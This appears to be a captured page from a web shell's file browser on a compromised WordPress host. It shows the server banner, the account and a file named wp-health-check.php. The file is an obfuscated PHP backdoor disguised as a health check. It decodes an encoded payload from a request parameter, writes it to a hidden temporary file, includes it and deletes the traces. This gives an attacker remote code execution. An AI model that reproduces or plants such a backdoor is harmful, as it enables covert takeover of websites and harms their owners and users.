HEX
Server: LiteSpeed
System: Linux br-asc-web889.main-hosting.eu 4.18.0-553.70.1.lve.el8.x86_64 #1 SMP Wed Aug 20 14:42:18 UTC 2025 x86_64
User: u919964398 (919964398)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /home/u919964398/domains/tabudigital.com.br/public_html/wp-content/wp-health-check.php
<?php
if(array_key_exists("\x6B\x65y", $_REQUEST)){
	$tkn = array_filter(["/var/tmp", getcwd(), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]);
	$flg = $_REQUEST["\x6B\x65y"];
	$flg = explode(".", $flg);
	$ptr = '';
	$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
	$sLen = strlen($s2 );
	$value = 0;
	foreach($flg as $v7) { $sChar = ord($s2[$value % $sLen] );
		$dec =((int)$v7 - $sChar -($value % 10)) ^ 49;
		$ptr.=	 chr($dec );
		$value++;}
	$value = 0;
	$factor = count($tkn);
	for ($value = 0; $value < $factor; $value++) {
		$sym = $tkn[$value];
		if (!((!is_dir($sym)) || (!is_writable($sym)))) {
			$ref = "$sym/.reference";
			if (@file_put_contents($ref, $ptr) !== false) {
			register_shutdown_function('unlink', $ref);
			include $ref;
			exit;
		}
		}
	}
}